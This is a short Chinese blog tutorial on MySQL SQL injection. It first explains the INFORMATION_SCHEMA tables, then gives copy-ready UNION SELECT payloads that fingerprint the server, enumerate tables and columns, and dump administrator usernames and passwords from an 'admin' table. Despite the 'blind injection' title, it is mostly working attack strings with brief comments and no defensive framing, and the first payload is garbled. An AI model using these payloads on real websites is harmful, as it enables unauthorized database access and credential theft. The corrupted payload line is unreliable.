本文介绍MYSQL盲注的一些语句和方法

学习盲注前先了解下 IFORMATION_SCHEMA 库

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
|---字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|---字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|---字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
|---字段：TABLE_SCHEMA ->该字段所属数据库名
|---字段：TABLE_NAME ->存储所属表的名称

|---字段：COLUMN_NAME ->该字段的名称

 

###########################################################################

0x001 获取系统信息:

union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da​tabase(),0x3c62723e,database()),7,8,9 /*

/*

@@global.version_compile_os 获取系统版本

@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值

*/

 

######################################################################

0x002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*

 

/*

0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################

 

0x003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*

/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表

0x67617264656e ->数据库名

*/

#####################################################################

 

0x004 获取数据

union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin

 

/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据

*/

 

from：叶少blog